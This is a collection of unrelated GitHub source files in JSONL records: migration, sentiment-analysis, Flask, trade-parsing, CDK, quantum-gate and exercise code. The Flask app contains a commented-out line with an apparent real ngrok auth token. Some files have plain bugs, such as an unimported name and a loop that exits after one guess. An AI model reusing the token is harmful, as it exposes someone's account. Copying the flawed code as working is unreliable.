migrationState: %s \" % (vm_id, vms[vm_id]['migrationState']))\r\n\t\t\t\tif self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\tmigrationState = vms[vm_id]['migrationState']\r\n\t\t\t\tif migrationState == '' or migrationState == 'migrated':\r\n\t\t\t\t\tself.export_vm(vm_id)\r\n\t\t\t\t\tself.import_vm(vm_id)\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'exported':\r\n\t\t\t\t\tself.import_vm(vm_id)\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'imported':\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'launched':\r\n\t\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\t\t\tvms[vm_id]['migrationState'] = 'migrated'\r\n\t\t\t\t\tmigrate.remove(vm_id)\r\n\t\t\t\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'migrate', migrate)], True)\r\n\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\texcept Exception as e:\r\n\t\t\tself.handleError(e)\r\n\t\t\ttraceback.print_exc()\r\n\t\t\tself.log.exception(\"Migration stopped with the following stacktrace:\")\r\n\t\tfinally:\r\n\t\t\tself.commonService.afterMigrationTeardown()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\thypverMigrator = HypverMigrator(None)\r\n\thypverMigrator.do_migration()\r\n\r\n","repo_name":"chipchilders/migrate2cs","sub_path":"migrate_hyperv.py","file_name":"migrate_hyperv.py","file_ext":"py","file_size_in_byte":27760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4420150905","text":"import torch\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-model', required=True, help=\"trained model prefix, also include dir, e.g. 
../data/model-100\")\n\n args = parser.parse_args()\n\n model_path = args.model\n\n checkpoint = torch.load(model_path, map_location='cpu')\n assert 'args' in checkpoint\n assert 'model' in checkpoint\n args = checkpoint['args']\n model = checkpoint['model']\n\n checkpoint_new = {}\n model_new = {}\n\n for key in model.keys():\n # print(key)\n if 'decoder' in key and 'fc' in key:\n continue\n else:\n model_new[key] = model[key]\n\n checkpoint_new['args'] = args\n checkpoint_new['args'].arch = \"transformer_noffn_t2t_wmt_en_de\"\n checkpoint_new['model'] = model_new\n\n torch.save(checkpoint_new, 'checkpoint_noffn.pt')\n\n print(\"finished!\")","repo_name":"Lollipop321/mini-decoder-network","sub_path":"scripts/convert_to_noffn.py","file_name":"convert_to_noffn.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"381333792","text":"import os\nimport requests\nimport re\nimport json\nimport fnmatch\nfrom datetime import date, timedelta\nfrom flask import Blueprint, request, jsonify, json\nfrom dotenv import load_dotenv\nfrom flatten_json import flatten\nfrom pandas import json_normalize, DataFrame\nfrom time import sleep\n\nload_dotenv()\n\nsentiment_bp = Blueprint(\"sentiment_bp\", __name__, url_prefix='/sentiment_api')\n\nSENTIMENT_KEY = os.environ.get(\"MEANING_CLOUD_API_KEY\")\nSENTIMENT_URL = 'https://api.meaningcloud.com/sentiment-2.1'\nCONFIDENCE_CUTOFF = 85\n\n\ndef remove_beg_end_punctuation(s):\n i, j = 0, 0\n while i <= len(s)-1 and not s[i].isalnum():\n i += 1\n\n if i >= len(s)-1:\n return ''\n\n s = s[i:][::-1]\n while j <= len(s)-1 and not s[j].isalnum():\n j += 1\n\n new_word = s[j:][::-1]\n last_two_letters = new_word[len(new_word)-2:]\n if last_two_letters == \"’s\" or last_two_letters[0] == '@':\n return new_word[:len(new_word)-2]\n return new_word\n\n\n# @sentiment_bp.route('/flatten', methods=['GET'])\ndef flatten_json(input):\n flattened_json = flatten(input)\n texts = [key for key, val in flattened_json.items() if key.endswith('text')]\n forms = [key for key, val in flattened_json.items() if key.endswith('form')]\n\n output, keys = [], set()\n\n for text in texts:\n if text[:len(text)-4]+'score_tag' in flattened_json and text[:len(text)-4]+'confidence' in flattened_json:\n text_sentiment = {\n \"text\": remove_beg_end_punctuation(flattened_json[text]),\n \"score_tag\": flattened_json[text[:len(text)-4]+'score_tag'],\n \"confidence\": flattened_json[text[:len(text)-4]+'confidence'],\n }\n\n if text_sentiment[\"text\"] and text_sentiment[\"text\"] not in keys and int(text_sentiment[\"confidence\"]) >= CONFIDENCE_CUTOFF and text_sentiment[\"score_tag\"] != \"NONE\":\n output.append(text_sentiment)\n keys.add(text_sentiment[\"text\"])\n\n for form in forms:\n\n if re.search('sentimented_concept_list', form):\n list_name = 'sentimented_concept_list'\n elif re.search('sentimented_entity_list', form):\n list_name = 'sentimented_entity_list'\n\n res = [m.start() for m in re.finditer(list_name, form)][-1]\n\n form_sentiment = {\n \"text\" : remove_beg_end_punctuation(flattened_json[form]),\n \"confidence\": flattened_json[form[:res]+'confidence'],\n \"score_tag\": flattened_json[form[:len(form)-4]+'score_tag']\n }\n\n if form_sentiment[\"text\"] and form_sentiment[\"text\"] not in keys and form_sentiment[\"score_tag\"] != 'NONE' and int(form_sentiment[\"confidence\"]) >= CONFIDENCE_CUTOFF:\n output.append(form_sentiment)\n keys.add(form_sentiment[\"text\"])\n\n return 
\n    return output\n\n# sentence_list > segment_list > polarity_term_list > sentimented_concept_list\n# sentence_list > segment_list > polarity_term_list > sentimented_concept_list > sentimented_entity_list\n\n# @sentiment_bp.route('/flatten', methods=['GET'])\ndef return_sentiment(text):\n    if text[\"agreement\"] == \"DISAGREEMENT\":\n        return False\n\n    sentiment = {\n        \"text\": text[\"sentence_list\"][0][\"text\"],\n        \"confidence\": text[\"confidence\"],\n        \"irony\": text[\"irony\"],\n        \"score_tag\": text[\"score_tag\"]\n    }\n\n    return sentiment\n\n\n# @sentiment_bp.route('', methods=['GET'])\ndef get_sentiment(text_input):\n    params = {\n        'key': SENTIMENT_KEY,\n        'txt': text_input,\n        'lang': \"en\"\n    }\n\n    try:\n        sleep(1)\n        response = requests.post(\n            SENTIMENT_URL,\n            data=params\n        )\n\n    except requests.exceptions.RequestException:\n        # keep the (headline, details) return contract on request failure\n        return False, False\n\n    text = response.json()\n\n    if text[\"agreement\"] == \"DISAGREEMENT\" or text[\"score_tag\"] == \"NONE\" or int(text[\"confidence\"]) < CONFIDENCE_CUTOFF:\n        return False, False\n\n    sentiment_headline = {\n        \"text\": text[\"sentence_list\"][0][\"text\"],\n        \"confidence\": text[\"confidence\"],\n        \"irony\": text[\"irony\"],\n        \"score_tag\": text[\"score_tag\"]\n    }\n\n    sentiment = flatten_json(text)\n\n    return sentiment_headline, sentiment","repo_name":"hannahtan96/volatile-back-end","sub_path":"app/routes/sentiment_routes.py","file_name":"sentiment_routes.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"20304253853","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport json, os, requests, shutil\nfrom datetime import datetime, timedelta\nfrom flask import Flask, jsonify, make_response, Response, request, redirect, session, url_for, render_template, __version__\n#from pyngrok import ngrok\n\n\n###############\n## App Setup ##\n###############\n\n# FLASK #\nAPP_NAME = 'showOrder'\nSTATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')\napp = Flask(__name__, static_folder=STATIC_DIR)\n\n\n# NGROK #\n# ngrok.set_auth_token(\"1lkRMJVY5ULy72xJIQ2pVgbCvY5_6CNYvbLDmsk4bbKkNx1WY\")\n# http_tunnel = ngrok.connect('https://localhost:5000/', bind_tls=True)\n\n\n############\n## ROUTES ##\n############\n\n@app.route('/')\ndef home():\n    print(\"> > > MAIN < < <\")\n    return render_template('index.html', flask_ver=__version__)\n\n@app.route(\"/get_order\", methods=['POST','GET'])\ndef get_order():\n    print(\"> > > GET ORDER < < <\")\n    #order_data = request.json\n    #order_url = order_data['value'][0]['order_url']\n    order_url = 'http://www.google.com/index.html'\n\n    r = requests.get(order_url, allow_redirects=True)\n    open('static/show_order_data.html', 'wb').write(r.content)\n\n    print(order_url)\n    return Response(status=200, content_type=\"text/plain\")\n\n@app.route(\"/door_closed\", methods=['GET','POST'])\ndef door_closed():\n    print(\"> > > DOOR CLOSED < < <\")\n    original = 'static/tinybreadbox_logo.html'\n    target = 'static/show_order_data.html'\n    shutil.copyfile(original, target)\n    return Response(status=200, content_type=\"text/plain\")\n\n\n##########\n## MISC ##\n##########\n\n# @app.errorhandler(404)\n# def not_found(error):\n    # return make_response(jsonify({'error': 'Not found'}), 404)\n    \nif __name__ == '__main__':\n    app.run() #host='0.0.0.0', 
ssl_context='adhoc'","repo_name":"reeebot/showOrder","sub_path":"app_bkp.py","file_name":"app_bkp.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70581994810","text":"from decimal import Decimal\nfrom datetime import datetime\nfrom document_parser import DocumentParser\n\n\nclass BinanceXlsxParser(DocumentParser):\n # WARNING: You must download your \"Trade History\" from Binance, **NOT** \"Order History\" \n # Order History has a completely different formatting which will not work. \n def __init__(self, *args, **kwargs):\n kwargs['exchange_name'] = 'binance'\n kwargs['header'] = {\n 'created_at': 'Date(UTC)',\n 'amount': 'Amount',\n 'fill_amount': 'Total',\n 'currency_pair': 'Market',\n 'type': 'Type',\n 'price': 'Price',\n }\n kwargs['header_rows'] = 0\n super(BinanceXlsxParser, self).__init__(*args, **kwargs)\n\n def process_row(self, row):\n row['created_at'] = self.process_date(row)\n row['currency_pair'] = self.process_currency_pair(row)\n row['type'] = row['type'].lower()\n\n for key in ('amount', 'fill_amount', 'price'):\n row[key] = abs(Decimal(row[key]))\n return row\n\n def process_date(self, row):\n _date = row['created_at']\n if isinstance(_date, str):\n return datetime.strptime(_date, '%Y-%m-%d %H:%M:%S')\n if isinstance(_date, date):\n return datetime(_date.year, _date.month, _date.day)\n else:\n return _date\n\n def process_currency_pair(self, row):\n # WARNING: If USD is added to the quote pair, we'll need to change how we parse pairs below\n # because pair[-3:] will match USD even if it's TUSD, etc. \n quote_pairs = ['USDC', 'USDT', 'TUSD', 'BUSD', 'DAI', 'BTC', 'ETH']\n pair = row['currency_pair']\n\n if pair[-3:] in quote_pairs:\n first = pair[:-3] \n last = pair[-3:]\n elif pair[-4:] in quote_pairs:\n first = pair[:-4] \n last = pair[-4:]\n else:\n raise Exception('Binance quote pair is not one of {}'.format(quote_pairs))\n\n if first == 'BCC':\n first = 'BCH'\n return first + \"-\" + last\n","repo_name":"justinmart/simple_taxes","sub_path":"exchange_parsers/binance_xlsx.py","file_name":"binance_xlsx.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"77"} +{"seq_id":"25726360349","text":"from setuptools import setup, find_packages\n\ntry:\n from pypandoc import convert\n read_md = lambda f: convert(f, 'rst')\nexcept ImportError:\n print(\"warning: pypandoc module not found, could not convert Markdown to RST\")\n read_md = lambda f: open(f, 'r').read()\n\n__version__ = None\nexec(open('pyvt/_version.py').read()) # load the actual __version__\n\nsetup(\n name='pyvt',\n version=__version__,\n maintainer='Arman Noroozian',\n maintainer_email='arman.noroozian.developer@gmail.com',\n url='https://github.com/anoroozian/pyvt',\n description='Python VirusTotal Private API 2.0 Implementation.',\n long_description=read_md('README.md'),\n license='MIT',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Security',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n keywords='virustotal api private',\n # py_modules=['__init__', '_version'],\n packages=find_packages(exclude=['tests', 'tests.*']),\n include_package_data=True,\n tests_require=['nose', 
'coverage'],\n    zip_safe=False,\n    test_suite='nose.collector',\n    # packages=find_packages(exclude=['tests', 'tests.*']),\n    # setup_requires=[],\n    install_requires=['requests'],\n    # data_files=[],\n    # scripts=[],\n    # **extra_kwargs\n)\n\n\n","repo_name":"anoroozian/pyvt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"415165808","text":"# Using Python to solve the questions.\n# Question 2\n\n\ndef getSeason(num):\n    winter = [12, 1, 2]\n    spring = [3, 4, 5]\n    summer = [6, 7, 8]\n    autumn = [9, 10, 11]\n    if num in winter:\n        return \"Winter\"\n    elif num in spring:\n        return \"Spring\"\n    elif num in summer:\n        return \"Summer\"\n    elif num in autumn:\n        return \"Autumn\"\n    else:\n        raise ValueError(\"Invalid Value.\")\n\n\nprint(getSeason(222))\n","repo_name":"ntexplorer/PythonPractice","sub_path":"CashCalc_Recruiment/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"24675447355","text":"# We import the \"random\" library to generate random numbers.\nimport random\n\n# We generate a random number between 0 and 100 and store it in the variable \"aletoria\".\naletoria = random.randint(0, 100)\n\n# We initialize a variable \"intentos\" at 0 to keep track of the user's attempts.\nintentos = 0\n\n# We create a loop that runs indefinitely until the user guesses the number.\nwhile True:\n    # We ask the user to enter the number they think is correct.\n    numero_usuario = int(input(\"\\nGUESS THE NUMBER (0 to 100): \"))\n\n    # We compare the number entered by the user with the generated random number.\n    if numero_usuario < aletoria:\n        # If the number entered by the user is lower, we show a message and increase the attempt counter.\n        intentos += 1\n        print(f\"The random number is greater than {numero_usuario}\\nAttempt #{intentos}\")\n\n    elif numero_usuario > aletoria:\n        # If the number entered by the user is higher, we show a message and increase the attempt counter.\n        intentos += 1\n        print(f\"The random number is less than {numero_usuario}\\nAttempt #{intentos}\")\n\n    else:\n        # If the user guesses the number, we show a message and the number of attempts.\n        intentos += 1\n        print(f\"YOU FOUND IT \\nThe number is {numero_usuario}\\nYou guessed it in {intentos} attempts\")\n\n    # We exit the loop using 'break'.\n    break","repo_name":"CarlangasDeveloper/Taller2_Programacion_Python","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"72986518328","text":"import aws_cdk as cdk\nimport aws_cdk.aws_sqs as sqs\nimport aws_cdk.aws_lambda as lambda_\nimport aws_cdk.aws_lambda_event_sources as eventsources\nimport aws_cdk.aws_dynamodb as ddb\nfrom constructs import Construct\n\n\n# Build a Stack with SQS -> lambda -> DDB\n# events from sqs are picked up by a lambda, which saves them in a DDB table\nclass Infra(cdk.Stack):\n\n    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n        super().__init__(scope, construct_id, **kwargs)\n\n        # create the queue\n        queue = sqs.Queue(\n            self, \"InfraStackQueue\",\n            visibility_timeout=cdk.Duration.seconds(300),\n        )\n
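\n        # note: keep the queue's visibility timeout (300 seconds here) at or above the\n        # Lambda function's timeout, or in-flight messages can be redelivered mid-invocation\n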
\"InfraStackLambda\",\n runtime=lambda_.Runtime.PYTHON_3_8,\n handler=\"handler.lambda_handler\",\n code=lambda_.Code.from_asset(\"monorepo_cdk\")\n )\n\n # set up the queue as an event source to the lambda\n fn.add_event_source(eventsources.SqsEventSource(queue))\n\n # create the Dynamo DB table and grant r/w permission tot he lambda function\n table = ddb.Table(self, \"InfraStackDDB\",\n partition_key=ddb.Attribute(name=\"id\", type=ddb.AttributeType.STRING))\n table.grant_read_write_data(fn)\n\n # the actual table name is not known until deployment, create a token and pass it as an env var to the lambda\n fn.add_environment(\"infra_ddb_table\", table.table_name)\n","repo_name":"iapostol-69/monorepo-cdk","sub_path":"monorepo_cdk/infra.py","file_name":"infra.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4375502236","text":"# 23.3.2022\n# testing tensors\n\nimport random\nfrom cmath import exp, pi, sqrt\n\nimport torch\nfrom torch import tensor, empty, zeros\n\nqtype = torch.complex64\n\n\nclass Qtensor(torch.Tensor):\n\n def __init__(self, x):\n super().__init__(x, dtype=torch.complex64)\n\n def qmm(self, B: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param B: a tensor\n :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n result[ii, jj] = A[ii] * B[jj]\n where ii is a multi-dim index of a and jj a multi-dim index of b\n \"\"\"\n m_A, n_A = self.size()\n m_B, n_B = B.size()\n result = empty(m_A * m_B, n_A * n_B, dtype=self.dtype)\n for i in range(m_A):\n for j in range(n_A):\n result[i * m_B:(i + 1) * m_B, j * n_B:(j + 1) * n_B] = self[i, j] * B\n return Qtensor(result)\n\n def qmv(self, psi: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param psi: a vector\n :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n result[i, j] = A[i] * B[j]\n where i is a multi-dim index of a and j a multi-dim index of b\n \"\"\"\n B = psi.view(-1, 1)\n return self.mm(B)\n\n def qpow(self, n):\n if n == 0:\n return Qtensor(torch.eye(self.size()[0]))\n if n == 1:\n return self\n else:\n n, r = divmod(n, 2)\n B = self.qpow(n)\n C = B.qmm(B)\n return C if r == 0 else self.qmm(C)\n\n\ndef int2bin(i, n):\n \"\"\"\n :param i: an integer >= 0\n :param n: length of list\n :return: binary index of length max(n, log2(i))\n 6, 2 -> [1, 1, 0]\n 6, 3 -> [1, 1, 0]\n 6, 4 -> [0, 1, 1, 0]\n \"\"\"\n return [int(c) for c in bin(i)[2:].rjust(n, '0')]\n\n\ndef bin2int(ii):\n \"\"\"\n :param ii: a binary index, e.g. [0,1,0,0,1]\n :return: integer value of this number, [0,1,0,0,1] -> 9\n \"\"\"\n result = 0\n for digit in ii:\n result = (result << 1) | digit\n return result\n\n\ndef basis(ii):\n \"\"\"\n :param ii: a binary number given as list, e.g. 
\n\n\ndef basis(ii):\n    \"\"\"\n    :param ii: a binary number given as list, e.g. [0,1, 1]\n    :return: the corresponding base vector, size = (2**n, 1).\n    Example:\n    basis([0, 0, 0]) = [1, 0, 0, 0, 0, 0, 0, 0].T\n    basis([0, 1, 1]) = [0, 0, 0, 1, 0, 0, 0, 0].T\n    basis([1, 1, 1]) = [0, 0, 0, 0, 0, 0, 0, 1].T\n    \"\"\"\n    result = zeros(2 ** len(ii), dtype=qtype)\n    result[bin2int(ii)] = 1\n    return Qtensor(result)\n\n\ndef apply(Q, x):\n    result = Q[0].mm(x)\n    for q in Q[1:]:\n        result = q.mm(result)\n    return result\n\n\ndef U(f, n):\n    \"\"\"\n    :param f: a binary function of n - 1 binary variables\n    :param n: the number n >= 2\n    :return: the unitary (2**n x 2**n) matrix U(f)\n    \"\"\"\n    N = 2 ** n\n    U = zeros((N, N), dtype=qtype)\n    for i in range(N):\n        ii = int2bin(i, n)\n        head, tail = ii[:-1], ii[-1]\n        j = bin2int(head + [f(head) ^ tail])\n        U[i, j] = 1\n    return U\n\n\ndef reorder(perm):\n    \"\"\"\n    :param perm: permutation of n integers 0, .., n-1\n    :return: permutation of integers 0, .., 2**n - 1\n    example: perm = [1, 0, 2] swaps columns 0 and 1.\n    This yields [0, 1, 4, 5, 2, 3, 6, 7]\n    0: [0, 0, 0]\n    1: [0, 0, 1]\n    4: [1, 0, 0]\n    5: [1, 0, 1]\n    2: [0, 1, 0]\n    3: [0, 1, 1]\n    6: [1, 1, 0]\n    7: [1, 1, 1]\n    \"\"\"\n    n = len(perm)\n    binaries = [int2bin(j, n) for j in range(2 ** n)]\n    return [bin2int([b[i] for i in perm]) for b in binaries]\n\n\ndef tmul(A, B):\n    \"\"\"\n    :param A: a tensor\n    :param B: a tensor\n    :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n    result[i, j] = A[i] * B[j]\n    where i is a multi-dim index of a and j a multi-dim index of b\n    \"\"\"\n    m_A, n_A = A.size()\n    m_B, n_B = B.size()\n    result = empty(m_A * m_B, n_A * n_B, dtype=A.dtype)\n    for i in range(m_A):\n        for j in range(n_A):\n            result[i * m_B:(i + 1) * m_B, j * n_B:(j + 1) * n_B] = A[i, j] * B\n    return result\n\n\ndef tpow(A, n):\n    if n == 0:\n        return torch.eye(A.size()[0], dtype=A.dtype)\n    if n == 1:\n        return A\n    else:\n        n, r = divmod(n, 2)\n        B = tpow(A, n)\n        C = tmul(B, B)\n        return C if r == 0 else tmul(A, C)\n\n\ndef measure(x):\n    # the state vector holds complex amplitudes, so sample with probabilities |amplitude|**2\n    n = x.size()[0]\n    return random.choices(range(n), weights=(x.abs() ** 2).flatten().tolist())\n\n\n# identity\nI = Qtensor([[1, 0],\n             [0, 1]])\n\n# NOT, Pauli-X\nX = Qtensor([[0, 1],\n             [1, 0]])\n\n# Pauli-Y\nY = Qtensor([[0, -1j],\n             [1j, 0]])\n\n# Pauli-Z\nZ = Qtensor([[1, 0],\n             [0, -1]])\n\n# Phase\nS = Qtensor([[1, 0],\n             [0, 1j]])\n\n# Hadamard\nH = 1 / sqrt(2) * Qtensor([[1, 1],\n                           [1, -1]])\n# pi/8\nT = Qtensor([[1, 0],\n             [0, exp(1j * pi / 4)]])\n\n# Controlled NOT\nCX = Qtensor([[1, 0, 0, 0],\n              [0, 1, 0, 0],\n              [0, 0, 0, 1],\n              [0, 0, 1, 0]])\n\n# controlled Z\nCZ = Qtensor([[1, 0, 0, 0],\n              [0, 1, 0, 0],\n              [0, 0, 1, 0],\n              [0, 0, 0, -1]])\n\n# SWAP\nSWAP = Qtensor([[1, 0, 0, 0],\n                [0, 0, 1, 0],\n                [0, 1, 0, 0],\n                [0, 0, 0, 1]])\n\n# Toffoli\nTOFF = Qtensor([[1, 0, 0, 0, 0, 0, 0, 0],\n                [0, 1, 0, 0, 0, 0, 0, 0],\n                [0, 0, 1, 0, 0, 0, 0, 0],\n                [0, 0, 0, 1, 0, 0, 0, 0],\n                [0, 0, 0, 0, 1, 0, 0, 0],\n                [0, 0, 0, 0, 0, 1, 0, 0],\n                [0, 0, 0, 0, 0, 0, 0, 1],\n                [0, 0, 0, 0, 0, 0, 1, 0]])\n\nBELL = CX.mm(tmul(H, I))\n# BELL = CX.mm(H.qmm(I))\n\nH1 = Qtensor([[1, 1],\n              [1, -1.]])\n\nBELL1 = CX.mm(tmul(H1, I))\n\n\n# Deutsch-Jozsa Algorithm\n\ndef f_const(c):\n    return lambda x: c\n\n\ndef f_mod2(x):\n    return x[-1]\n\n\ndef f_xor(x):\n    return x[0] if len(x) == 1 else x[0] ^ x[1]\n\n\ndef DEUTSCH(f, n):\n    H1 = tmul(tpow(H, n - 1), I)\n    return [H1, U(f, n), H1]\n\n\ndef DEUTSCH_(f, n):\n    Hn = tpow(H, n)\n    return [Hn, U(f, n), Hn]\n\n\nif __name__ == '__main__':\n    pass\n    print(BELL)\n\n    n = 3\n    y = 1 / sqrt(2) * tensor([1, -1], dtype=qtype)\n    psi = basis((n - 1) * [0]).qmv(y)\n    
psi_ = basis((n - 1) * [0] + [1])\n\n # Hn = tpow(H, n)\n # f = f_const(1)\n # # f = f_xor\n # Uf = U(f, n)\n # print('\\n', psi_)\n # print('\\n', Hn.real)\n # print('\\n', Uf.real)\n # # print('\\n', Uf.mm(Hn))\n # # print('\\n', Hn.mm(Uf.mm(Hn)))\n # # print('\\n', Hn.mm(Uf.mm(Hn)).mm(psi_))\n\n # print(H1)\n # print()\n # print(Uf)\n # print()\n # print(Uf.mm(H1))\n #\n # fs = [f_const(0), f_const(1), f_xor, f_mod2]\n # tbl = torch.empty(2 ** n).view(-1, 1)\n #\n # for f in fs:\n # tbl = torch.cat((tbl, apply(DEUTSCH(f, n), psi).real), 1)\n #\n # df = pd.DataFrame(tbl, columns=['idx', 'f_const0', 'f_const1', 'f_xor', 'f_mod2'])\n # df['idx'] = [int2bin(i, n) for i in range(2 ** n)]\n # print(df)\n # print())\n #\n # tbl = torch.empty(2 ** n).view(-1, 1)\n # for f in fs:\n # tbl = torch.cat((tbl, apply(DEUTSCH_(f, n), psi_).real), 1)\n #\n # print('\\n', psi_)\n # df = pd.DataFrame(tbl, columns=['idx', 'f_const0', 'f_const1', 'f_xor', 'f_mod2'])\n # df['idx'] = [int2bin(i, n) for i in range(2 ** n)]\n # print(df)\n\n # Superdense Coding\n\n # def DENSE(a, b):\n # return [BELL, tmul(tpow(X, a), I), tmul(tpow(Z, b), I), BELL.T]\n #\n # for a in range(2):\n # for b in range(2):\n # y = apply(DENSE(a, b), basis([0, 0])).view(2, 2)\n # print(y[b, a])\n\n # Teleportation\n\n # TELE = [tmul(I, BELL),\n # tmul(BELL.T, I)] # BELL.T == BELL ** (-1)\n #\n # alpha = 0.1\n # psi = tensor([alpha, sqrt(1 - alpha ** 2)], dtype=qtype).view(-1, 1)\n # x = tmul(psi, basis([0, 0]))\n # y = apply(TELE, x).view(2, 2, 2)\n #\n # for a in range(2):\n # for b in range(2):\n # phi = 2 * tpow(Z, a).mm(tpow(X, b).mm(y[a, b].view(-1, 1)))\n # print(phi - psi)\n","repo_name":"johsieders/potpourri","sub_path":"fttp/src/qbits/scratch2.py","file_name":"scratch2.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46619219246","text":"'''\nSuccess\nDetails\nRuntime: 456 ms, faster than 15.73% of Python online submissions for Course Schedule.\nMemory Usage: 14.1 MB, less than 57.63% of Python online submissions for Course Schedule.\n'''\n\n\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n courses = [0] * numCourses\n for course_pair in prerequisites:\n courses[course_pair[0]] += 1\n\n num = 0\n stack = []\n for i in range(len(courses)):\n if courses[i] == 0:\n num += 1\n stack.append(i)\n\n while stack:\n i = stack.pop()\n for course_pair in prerequisites:\n if course_pair[1] == i:\n courses[course_pair[0]] -= 1\n if courses[course_pair[0]] == 0:\n num += 1\n stack.append(course_pair[0])\n\n return num == numCourses\n\n\n\n'''\nSuccess\nDetails \nRuntime: 76 ms, faster than 93.03% of Python online submissions for Course Schedule.\nMemory Usage: 14.1 MB, less than 57.63% of Python online submissions for Course Schedule.\n\n'''\n\nfrom collections import deque\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n edges = [[] for i in range(numCourses)]\n degree = [0] * numCourses\n for i, j in prerequisites:\n edges[j].append(i)\n degree[i] += 1\n\n num = 0\n queue = deque([])\n for i in range(numCourses):\n if degree[i] == 0:\n queue.append(i)\n num += 1\n # print(num)\n\n while queue:\n i = queue.popleft()\n for j in edges[i]:\n degree[j] -= 1\n if degree[j] == 0:\n 
queue.append(j)\n                    num += 1\n            # print(num)\n            # print(queue)\n        return num == numCourses\n\n\n\n\n","repo_name":"dongbo910220/leetcode_","sub_path":"Graph/207. Course Schedule Medium.py","file_name":"207. Course Schedule Medium.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"29465605729","text":"class Carro:\n    def __init__(self):\n        self.lista_de_productos = []\n        self.descuento = 0\n        self.total = 0\n        self.direccion = \"\"\n\n    def agregar_item(self, cantidad, producto):\n        for item in self.lista_de_productos:\n            if item.producto == producto:\n                if cantidad == 0:\n                    self.lista_de_productos.remove(item)\n                else:\n                    item.cantidad = cantidad\n                return\n        item = Item(cantidad, producto)\n        self.lista_de_productos.append(item)\n\n    def checkout(self, tipoDespacho, direccion):\n        # Calculate discounts\n        for item in self.lista_de_productos:\n            self.descuento += item.producto.precio * item.cantidad\n\n        # Calculate the shipping cost\n        if tipoDespacho == 0:\n            despacho = self.descuento * 0.2\n        elif tipoDespacho == 1:\n            despacho = self.descuento * 0.3\n        else:\n            return \"Invalid dispatch type\"\n\n        # Calculate the total value\n        if \"Chile\" in direccion:\n            self.total = self.descuento - despacho + self.descuento * 0.2\n        else:\n            self.total = self.descuento - despacho\n\n        return self.total\n\n    def __repr__(self):\n        s = \"Shopping Cart:\\n\"\n        for item in self.lista_de_productos:\n            s += \"{0}: {1}\\n\".format(item.cantidad, item.producto.nombre)\n        return s\n\ncarro = Carro()\ncarro.agregar_item(2, tienda.buscarProducto(1))\ncarro.agregar_item(1, tienda.buscarProducto(2))\nprint(carro.checkout(0, \"Alameda 340 Santiago Chile\"))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej1/tema8_ej1_a8d1218b2430977ecccecd26b0f093f5.py","file_name":"tema8_ej1_a8d1218b2430977ecccecd26b0f093f5.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
